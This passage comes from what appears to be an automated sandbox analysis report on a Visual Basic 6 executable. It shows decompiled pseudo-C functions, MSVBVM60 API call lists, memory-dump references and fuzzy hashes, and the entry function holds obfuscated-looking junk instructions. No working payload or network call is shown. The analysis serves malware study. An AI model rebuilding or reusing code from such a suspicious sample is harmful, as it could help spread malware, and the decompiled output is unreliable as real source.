            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AC63
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AC9C
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000088), ref: 0040ACE9
            • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?), ref: 0040AD5E
            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401196), ref: 0040AD69
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,?,00401196), ref: 0040AD81
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ADBA
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000170), ref: 0040AE04
            • __vbaVarMove.MSVBVM60 ref: 0040AE7C
            • __vbaFreeObj.MSVBVM60 ref: 0040AE84
            • __vbaFreeVar.MSVBVM60 ref: 0040AE8C
            • __vbaHresultCheckObj.MSVBVM60(00000000,004010F8,00401B58,000006F8), ref: 0040AEC8
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AEF8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AF31
            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00401D24,00000050), ref: 0040AF78
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AF9F
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AFD8
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000078), ref: 0040B01F
            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040B076
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,?,?,?,?,00401196), ref: 0040B091
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B0CA
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000068), ref: 0040B111
            • __vbaFreeObj.MSVBVM60(?,?), ref: 0040B163
            • __vbaHresultCheckObj.MSVBVM60(00000000,004010F8,00401B28,000002B4,?,?), ref: 0040B19A
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?), ref: 0040B1FC
            • __vbaObjSet.MSVBVM60(?,00000000,?,?), ref: 0040B235
            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00401D44,00000218,?,?), ref: 0040B27F
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?), ref: 0040B2A6
            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?), ref: 0040B2DF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$CheckHresult$FreeNew2$List$Chkstk$Move$#544Var2
            • String ID: 19:19:19
            • API String ID: 2805188520-362381601
            • Opcode ID: 6f566cfc70f49276470e9b968ba880d1b1bf0dc2c54e276861422a4307737c41
            • Instruction ID: f700f2df218265fe33c11daf620e59fa074f887f4030a56d6d31b81c7efa711d
            • Opcode Fuzzy Hash: 6f566cfc70f49276470e9b968ba880d1b1bf0dc2c54e276861422a4307737c41
            • Instruction Fuzzy Hash: 4B92E474940219DFDB20DF90CC49BDDB7B8BB08304F1085EAE509BB2A1DB795A89DF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
            				intOrPtr* _t12;
            				signed int _t13;
            				intOrPtr _t26;
            				void* _t29;
            
            				_push("VB5!6&*"); // executed
            				L004012BC(); // executed
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax ^ __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				asm("popfd");
            				_t12 =  *0xe42f2c80 + 0x37;
            				asm("adc byte [eax], 0x5a");
            				 *_t12 =  *_t12 + _t12;
            				 *__ecx =  *__ecx + _t12;
            				 *_t12 =  *_t12 + _t12;
            				 *_t12 =  *_t12 + __ecx;
            				_t13 = _t12 + 1;
            				 *__ecx =  *__ecx + 0x41;
            				asm("o16 insb");
            				asm("outsb");
            				 *((intOrPtr*)(__esi + 0x2fb)) =  *((intOrPtr*)(__esi + 0x2fb)) + __edx;
            				 *_t13 =  *_t13 + _t13;
            				 *_t13 =  *_t13 ^ _t13;
            				es = es;
            				_pop(_t26);
            				asm("repe retf 0x9645");
            				 *((intOrPtr*)(_t29 - 0x42)) = _t26;
            				_pop(es);
            				asm("adc al, 0x8");
            				 *(_t29 - 0x6654b720) =  *(_t29 - 0x6654b720) | __eax;
            				asm("clts");
            				asm("clc");
            				return __eax;
            			}







            0x004012c4
            0x004012c9
            0x004012ce
            0x004012d0
            0x004012d2
            0x004012d4
            0x004012d6
            0x004012da
            0x004012dc
            0x004012de
            0x004012e8
            0x004012e9
            0x004012eb
            0x004012f3
            0x004012f5
            0x004012f7
            0x004012f9
            0x004012fd
            0x004012fe
            0x00401301
            0x00401303
            0x00401304
            0x0040130a
            0x0040130e
            0x00401310
            0x00401313
            0x00401314
            0x0040131f
            0x00401322
            0x00401324
            0x00401325
            0x0040132b
            0x0040132f
            0x00401330

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: #100
            • String ID: VB5!6&*
            • API String ID: 1341478452-3593831657
            • Opcode ID: 9f77ca96e00d6d196541f6dca017c27859c3ca10416ee231201f9083c15afad8
            • Instruction ID: 7141749032a25ed65dec8f7528695c4b35daec877f43c10614dbc24388ec7a7a
            • Opcode Fuzzy Hash: 9f77ca96e00d6d196541f6dca017c27859c3ca10416ee231201f9083c15afad8
            • Instruction Fuzzy Hash: 16F0986254E3C11FD30357349C21A823FB1AE43264B1B80EBC0D5DF1F3D229494AC762
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 58%
            			E0040B738(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a8) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				void* _v24;
            				intOrPtr _v28;
            				char _v40;
            				intOrPtr* _v44;
            				signed int _v48;
            				intOrPtr* _v56;
            				signed int _v60;
            				signed int _t25;
            				intOrPtr* _t27;
            				char* _t28;
            				intOrPtr _t42;
            
            				_push(0x401196);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t42;
            				_t25 = 0x28;
            				L00401190();
            				_v12 = _t42;
            				_v8 = 0x401110;
            				L00401244();
            				asm("fldz");
            				L00401214();
            				L0040123E();
            				asm("fcomp qword [0x401108]");
            				asm("fnstsw ax");
            				asm("sahf");
            				if(__eflags != 0) {
            					if( *0x40d33c != 0) {
            						_v56 = 0x40d33c;
            					} else {
            						_push(0x40d33c);
            						_push(0x401d04);
            						L00401286();
            						_v56 = 0x40d33c;
            					}
            					_t27 =  *_v56;
            					_v44 = _t27;
            					L00401238();
            					_t28 =  &_v40;
            					L0040128C();
            					_t25 =  *((intOrPtr*)( *_v44 + 0x40))(_v44, _t28, _t28, _t27, _v28, 0x401d6c, L"Filmbyer");
            					asm("fclex");
            					_v48 = _t25;
            					if(_v48 >= 0) {
            						_t19 =  &_v60;
            						 *_t19 = _v60 & 0x00000000;
            						__eflags =  *_t19;
            					} else {
            						_push(0x40);
            						_push(0x401cf4);
            						_push(_v44);
            						_push(_v48);
            						L00401280();
            						_v60 = _t25;
            					}
            					L0040126E();
            				}
            				asm("wait");
            				_push(0x40b833);
            				L00401268();
            				L0040126E();
            				return _t25;
            			}
















            0x0040b73d
            0x0040b748
            0x0040b749
            0x0040b752
            0x0040b753
            0x0040b75b
            0x0040b75e
            0x0040b76b
            0x0040b770
            0x0040b772
            0x0040b777
            0x0040b77c
            0x0040b782
            0x0040b784
            0x0040b785
            0x0040b792
            0x0040b7ac
            0x0040b794
            0x0040b794
            0x0040b799
            0x0040b79e
            0x0040b7a3
            0x0040b7a3
            0x0040b7b6
            0x0040b7b8
            0x0040b7c8
            0x0040b7ce
            0x0040b7d2
            0x0040b7e0
            0x0040b7e3
            0x0040b7e5
            0x0040b7ec
            0x0040b805
            0x0040b805
            0x0040b805
            0x0040b7ee
            0x0040b7ee
            0x0040b7f0
            0x0040b7f5
            0x0040b7f8
            0x0040b7fb
            0x0040b800
            0x0040b800
            0x0040b80c
            0x0040b80c
            0x0040b811
            0x0040b812
            0x0040b825
            0x0040b82d
            0x0040b832

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B753
            • __vbaStrCopy.MSVBVM60(?,?,?,?,00401196), ref: 0040B76B
            • _CItan.MSVBVM60(?,?,?,?,00401196), ref: 0040B772
            • __vbaFpR8.MSVBVM60(?,?,?,?,00401196), ref: 0040B777
            • __vbaNew2.MSVBVM60(00401D04,0040D33C,?,?,?,?,00401196), ref: 0040B79E
            • __vbaCastObj.MSVBVM60(?,00401D6C,Filmbyer,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7C8
            • __vbaObjSet.MSVBVM60(?,00000000,?,00401D6C,Filmbyer,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7D2
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CF4,00000040,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7FB
            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B80C
            • __vbaFreeStr.MSVBVM60(0040B833,?,?,?,?,00401196), ref: 0040B825
            • __vbaFreeObj.MSVBVM60(0040B833,?,?,?,?,00401196), ref: 0040B82D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$Free$CastCheckChkstkCopyHresultItanNew2
            • String ID: Filmbyer
            • API String ID: 2758753910-3873735245
            • Opcode ID: 061b70053eedfe6ecd37eba7337b8fa1b2feadb4be956d3c05b53dc7e878791f
            • Instruction ID: 60b8d970ed1fa1a4995066ccab8966c221011f2224f6861e81e562bea0aaf7cc
            • Opcode Fuzzy Hash: 061b70053eedfe6ecd37eba7337b8fa1b2feadb4be956d3c05b53dc7e878791f
            • Instruction Fuzzy Hash: 94210771941208AFCB00EBA5C946BEEBBB8EF18714F20847AF501B61F1D77859448BAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E0040B974(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v32;
            				char _v36;
            				char _v52;
            				char _v68;
            				intOrPtr _v92;
            				intOrPtr _v100;
            				intOrPtr _v108;
            				char _v116;
            				void* _v120;
            				signed int _v124;
            				intOrPtr* _v136;
            				signed int _v140;
            				short _t50;
            				signed int _t53;
            				char* _t57;
            				void* _t71;
            				void* _t73;
            				intOrPtr _t74;
            
            				_t74 = _t73 - 0xc;
            				 *[fs:0x0] = _t74;
            				L00401190();
            				_v16 = _t74;
            				_v12 = 0x401138;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x74,  *[fs:0x0], 0x401196, _t71);
            				_v92 = 0x401d80;
            				_v100 = 8;
            				L00401298();
            				_push( &_v52);
            				_push( &_v68);
            				L0040122C();
            				_v108 = 0x401d8c;
            				_v116 = 0x8008;
            				_push( &_v68);
            				_t50 =  &_v116;
            				_push(_t50);
            				L004012A4();
            				_v120 = _t50;
            				_push( &_v68);
            				_push( &_v52);
            				_push(2);
            				L00401292();
            				_t53 = _v120;
            				if(_t53 != 0) {
            					if( *0x40d010 != 0) {
            						_v136 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v136 = 0x40d010;
            					}
            					_t57 =  &_v36;
            					L0040128C();
            					_v120 = _t57;
            					_t53 =  *((intOrPtr*)( *_v120 + 0x48))(_v120,  &_v32, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x310))( *_v136));
            					asm("fclex");
            					_v124 = _t53;
            					if(_v124 >= 0) {
            						_v140 = _v140 & 0x00000000;
            					} else {
            						_push(0x48);
            						_push(0x401d24);
            						_push(_v120);
            						_push(_v124);
            						L00401280();
            						_v140 = _t53;
            					}
            					_push(_v32);
            					L00401226();
            					L00401268();
            					L0040126E();
            				}
            				_push(0x40baed);
            				return _t53;
            			}
























            0x0040b977
            0x0040b986
            0x0040b990
            0x0040b998
            0x0040b99b
            0x0040b9a2
            0x0040b9b1
            0x0040b9b4
            0x0040b9bb
            0x0040b9c8
            0x0040b9d0
            0x0040b9d4
            0x0040b9d5
            0x0040b9da
            0x0040b9e1
            0x0040b9eb
            0x0040b9ec
            0x0040b9ef
            0x0040b9f0
            0x0040b9f5
            0x0040b9fc
            0x0040ba00
            0x0040ba01
            0x0040ba03
            0x0040ba0b
            0x0040ba11
            0x0040ba1e
            0x0040ba3b
            0x0040ba20
            0x0040ba20
            0x0040ba25
            0x0040ba2a
            0x0040ba2f
            0x0040ba2f
            0x0040ba5f
            0x0040ba63
            0x0040ba68
            0x0040ba77
            0x0040ba7a
            0x0040ba7c
            0x0040ba83
            0x0040ba9f
            0x0040ba85
            0x0040ba85
            0x0040ba87
            0x0040ba8c
            0x0040ba8f
            0x0040ba92
            0x0040ba97
            0x0040ba97
            0x0040baa6
            0x0040baa9
            0x0040bab1
            0x0040bab9
            0x0040bab9
            0x0040babe
            0x00000000

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B990
            • __vbaVarDup.MSVBVM60 ref: 0040B9C8
            • #522.MSVBVM60(?,?), ref: 0040B9D5
            • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0040B9F0
            • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0040BA03
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040BA2A
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BA63
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000048), ref: 0040BA92
            • #532.MSVBVM60(?), ref: 0040BAA9
            • __vbaFreeStr.MSVBVM60(?), ref: 0040BAB1
            • __vbaFreeObj.MSVBVM60(?), ref: 0040BAB9
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$Free$#522#532CheckChkstkHresultListNew2
            • String ID:
            • API String ID: 332616431-0
            • Opcode ID: 5dc676d7263997f83b46df07cd00d699b3749381a264a904d76474b644ba5810
            • Instruction ID: 8489ff4e9bc30615eab89219f0345df6dc3b8bd47095fd531ee03d58c2f5a424
            • Opcode Fuzzy Hash: 5dc676d7263997f83b46df07cd00d699b3749381a264a904d76474b644ba5810
            • Instruction Fuzzy Hash: FF41E575900218ABCB10EFA1C945BEDBBB8BF08704F2045BEE505BB1A1DB785949CF98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E0040BB68(void* __ebx, void* __ecx, void* __edi, void* __esi) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				char _v32;
            				char _v36;
            				char _v40;
            				intOrPtr _v48;
            				intOrPtr _v56;
            				intOrPtr* _v60;
            				signed int _v64;
            				intOrPtr* _v68;
            				signed int _v72;
            				intOrPtr* _v80;
            				intOrPtr* _v84;
            				signed int _v88;
            				signed int _v92;
            				char* _t50;
            				char* _t54;
            				signed int _t58;
            				signed int _t62;
            				char* _t64;
            				intOrPtr _t80;
            
            				_push(0x401196);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t80;
            				_push(0x48);
            				L00401190();
            				_v12 = _t80;
            				_v8 = 0x401148;
            				if( *0x40d010 != 0) {
            					_v80 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v80 = 0x40d010;
            				}
            				_push( *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x310))( *_v80));
            				_t50 =  &_v40;
            				_push(_t50);
            				L0040128C();
            				_v68 = _t50;
            				_v48 = 0x80020004;
            				_v56 = 0xa;
            				if( *0x40d010 != 0) {
            					_v84 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v84 = 0x40d010;
            				}
            				_t54 =  &_v36;
            				L0040128C();
            				_v60 = _t54;
            				_t58 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v32, _t54,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x2fc))( *_v84));
            				asm("fclex");
            				_v64 = _t58;
            				if(_v64 >= 0) {
            					_v88 = _v88 & 0x00000000;
            				} else {
            					_push(0x108);
            					_push(0x401d14);
            					_push(_v60);
            					_push(_v64);
            					L00401280();
            					_v88 = _t58;
            				}
            				L00401190();
            				asm("movsd");
            				asm("movsd");
            				asm("movsd");
            				asm("movsd");
            				_t62 =  *((intOrPtr*)( *_v68 + 0x1ec))(_v68, _v32, 0x10);
            				asm("fclex");
            				_v72 = _t62;
            				if(_v72 >= 0) {
            					_v92 = _v92 & 0x00000000;
            				} else {
            					_push(0x1ec);
            					_push(0x401d24);
            					_push(_v68);
            					_push(_v72);
            					L00401280();
            					_v92 = _t62;
            				}
            				L00401268();
            				_push( &_v40);
            				_t64 =  &_v36;
            				_push(_t64);
            				_push(2);
            				L00401262();
            				asm("wait");
            				_push(0x40bcf7);
            				return _t64;
            			}
























            0x0040bb6d
            0x0040bb78
            0x0040bb79
            0x0040bb80
            0x0040bb83
            0x0040bb8b
            0x0040bb8e
            0x0040bb9c
            0x0040bbb6
            0x0040bb9e
            0x0040bb9e
            0x0040bba3
            0x0040bba8
            0x0040bbad
            0x0040bbad
            0x0040bbd0
            0x0040bbd1
            0x0040bbd4
            0x0040bbd5
            0x0040bbda
            0x0040bbdd
            0x0040bbe4
            0x0040bbf2
            0x0040bc0c
            0x0040bbf4
            0x0040bbf4
            0x0040bbf9
            0x0040bbfe
            0x0040bc03
            0x0040bc03
            0x0040bc27
            0x0040bc2b
            0x0040bc30
            0x0040bc3f
            0x0040bc45
            0x0040bc47
            0x0040bc4e
            0x0040bc6a
            0x0040bc50
            0x0040bc50
            0x0040bc55
            0x0040bc5a
            0x0040bc5d
            0x0040bc60
            0x0040bc65
            0x0040bc65
            0x0040bc71
            0x0040bc7b
            0x0040bc7c
            0x0040bc7d
            0x0040bc7e
            0x0040bc8a
            0x0040bc90
            0x0040bc92
            0x0040bc99
            0x0040bcb5
            0x0040bc9b
            0x0040bc9b
            0x0040bca0
            0x0040bca5
            0x0040bca8
            0x0040bcab
            0x0040bcb0
            0x0040bcb0
            0x0040bcbc
            0x0040bcc4
            0x0040bcc5
            0x0040bcc8
            0x0040bcc9
            0x0040bccb
            0x0040bcd3
            0x0040bcd4
            0x00000000

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BB83
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,00401196), ref: 0040BBA8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BBD5
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,00000000), ref: 0040BBFE
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BC2B
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,00000108), ref: 0040BC60
            • __vbaChkstk.MSVBVM60 ref: 0040BC71
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,000001EC), ref: 0040BCAB
            • __vbaFreeStr.MSVBVM60 ref: 0040BCBC
            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040BCCB
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$CheckChkstkFreeHresultNew2$List
            • String ID:
            • API String ID: 2926503497-0
            • Opcode ID: 6ccf745f441f4c62e9cb566eea96fc10a83fda715399647bfba259104ae6f23f
            • Instruction ID: f8acdf6417d87216822bd523aa2b5652eecaf113733c272d50404b7777641c57
            • Opcode Fuzzy Hash: 6ccf745f441f4c62e9cb566eea96fc10a83fda715399647bfba259104ae6f23f
            • Instruction Fuzzy Hash: 2C41F675D01208EFDB00DFD1C845B9DBBB9FF08708F20446AF501BB2A1CBB969469B98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E0040BECB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v36;
            				char _v40;
            				intOrPtr* _v44;
            				signed int _v48;
            				signed int _v52;
            				intOrPtr* _v64;
            				signed int _v68;
            				signed int _v72;
            				char* _t46;
            				signed int _t50;
            				signed int _t53;
            				void* _t62;
            				void* _t64;
            				intOrPtr _t65;
            
            				_t65 = _t64 - 0xc;
            				 *[fs:0x0] = _t65;
            				L00401190();
            				_v16 = _t65;
            				_v12 = 0x401180;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401196, _t62);
            				if( *0x40d010 != 0) {
            					_v64 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v64 = 0x40d010;
            				}
            				_t46 =  &_v40;
            				L0040128C();
            				_v44 = _t46;
            				_t50 =  *((intOrPtr*)( *_v44 + 0x218))(_v44,  &_v36, _t46,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x310))( *_v64));
            				asm("fclex");
            				_v48 = _t50;
            				if(_v48 >= 0) {
            					_v68 = _v68 & 0x00000000;
            				} else {
            					_push(0x218);
            					_push(0x401d24);
            					_push(_v44);
            					_push(_v48);
            					L00401280();
            					_v68 = _t50;
            				}
            				_t53 =  *((intOrPtr*)( *_a4 + 0x16c))(_a4, _v36);
            				asm("fclex");
            				_v52 = _t53;
            				if(_v52 >= 0) {
            					_v72 = _v72 & 0x00000000;
            				} else {
            					_push(0x16c);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v52);
            					L00401280();
            					_v72 = _t53;
            				}
            				L00401268();
            				L0040126E();
            				_push(0x40bff1);
            				return _t53;
            			}




















            0x0040bece
            0x0040bedd
            0x0040bee7
            0x0040beef
            0x0040bef2
            0x0040bef9
            0x0040bf08
            0x0040bf12
            0x0040bf2c
            0x0040bf14
            0x0040bf14
            0x0040bf19
            0x0040bf1e
            0x0040bf23
            0x0040bf23
            0x0040bf47
            0x0040bf4b
            0x0040bf50
            0x0040bf5f
            0x0040bf65
            0x0040bf67
            0x0040bf6e
            0x0040bf8a
            0x0040bf70
            0x0040bf70
            0x0040bf75
            0x0040bf7a
            0x0040bf7d
            0x0040bf80
            0x0040bf85
            0x0040bf85
            0x0040bf99
            0x0040bf9f
            0x0040bfa1
            0x0040bfa8
            0x0040bfc4
            0x0040bfaa
            0x0040bfaa
            0x0040bfaf
            0x0040bfb4
            0x0040bfb7
            0x0040bfba
            0x0040bfbf
            0x0040bfbf
            0x0040bfcb
            0x0040bfd3
            0x0040bfd8
            0x00000000

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BEE7
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,00401196), ref: 0040BF1E
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF4B
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000218), ref: 0040BF80
            • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00401B28,0000016C), ref: 0040BFBA
            • __vbaFreeStr.MSVBVM60 ref: 0040BFCB
            • __vbaFreeObj.MSVBVM60 ref: 0040BFD3
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$CheckFreeHresult$ChkstkNew2
            • String ID:
            • API String ID: 304406766-0
            • Opcode ID: 8b76add1e6cc67a4afb41162d509ace17342c687416dbd0022a2ae6808e2a5c5
            • Instruction ID: 09efddce18da3363a93375e39524b062fc38ddcdc2b842d6f0712ea7e186b475
            • Opcode Fuzzy Hash: 8b76add1e6cc67a4afb41162d509ace17342c687416dbd0022a2ae6808e2a5c5
            • Instruction Fuzzy Hash: F731CF75941208AFCB04EFA5C849BDDBBB5FF08708F10446AF405BB2A1C7795945DFA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E0040BD12(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a28) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				void* _v40;
            				void* _v56;
            				signed int _v64;
            				signed int _v76;
            				signed int _t30;
            				void* _t40;
            				void* _t42;
            				intOrPtr _t43;
            
            				_t43 = _t42 - 0xc;
            				 *[fs:0x0] = _t43;
            				L00401190();
            				_v16 = _t43;
            				_v12 = 0x401158;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401196, _t40);
            				L00401298();
            				L00401298();
            				_t30 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0);
            				asm("fclex");
            				_v64 = _t30;
            				if(_v64 >= 0) {
            					_v76 = _v76 & 0x00000000;
            				} else {
            					_push(0x15c);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v64);
            					L00401280();
            					_v76 = _t30;
            				}
            				asm("wait");
            				_push(0x40bdb8);
            				L0040125C();
            				L0040125C();
            				return _t30;
            			}














            0x0040bd15
            0x0040bd24
            0x0040bd2e
            0x0040bd36
            0x0040bd39
            0x0040bd40
            0x0040bd4f
            0x0040bd58
            0x0040bd63
            0x0040bd72
            0x0040bd78
            0x0040bd7a
            0x0040bd81
            0x0040bd9d
            0x0040bd83
            0x0040bd83
            0x0040bd88
            0x0040bd8d
            0x0040bd90
            0x0040bd93
            0x0040bd98
            0x0040bd98
            0x0040bda1
            0x0040bda2
            0x0040bdaa
            0x0040bdb2
            0x0040bdb7

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BD2E
            • __vbaVarDup.MSVBVM60(?,?,?,?,00401196), ref: 0040BD58
            • __vbaVarDup.MSVBVM60(?,?,?,?,00401196), ref: 0040BD63
            • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00401B28,0000015C), ref: 0040BD93
            • __vbaFreeVar.MSVBVM60(0040BDB8), ref: 0040BDAA
            • __vbaFreeVar.MSVBVM60(0040BDB8), ref: 0040BDB2
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: __vba$Free$CheckChkstkHresult
            • String ID:
            • API String ID: 3894782938-0
            • Opcode ID: 728b36b0dd79d8ecde2d05c6e1384df2c79b7d1e3d8b377824d5f07ac8168f96
            • Instruction ID: b362e91c64746a5762c17bcbcc67b144ec7128f3c3d5559dfd5eaf917e70ce5e
            • Opcode Fuzzy Hash: 728b36b0dd79d8ecde2d05c6e1384df2c79b7d1e3d8b377824d5f07ac8168f96
            • Instruction Fuzzy Hash: 2D112530900208EFCB04EF95D886BDDBBB4EF08744F10846AF405BB1A0D7785A45CB88
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 45%
            			E0040B8A1(void* __ebx, void* __edi, void* __esi, signed int* _a24) {
            				intOrPtr _v12;
            				intOrPtr _v16;
            				long long _v48;
            				char _v56;
            				char _v72;
            				intOrPtr _v112;
            				char _v120;
            				short _v124;
            				short _t21;
            				char* _t23;
            				void* _t29;
            				intOrPtr _t30;
            
            				_t30 = _t29 - 0xc;
            				_push(0x401196);
            				_push( *[fs:0x0]);
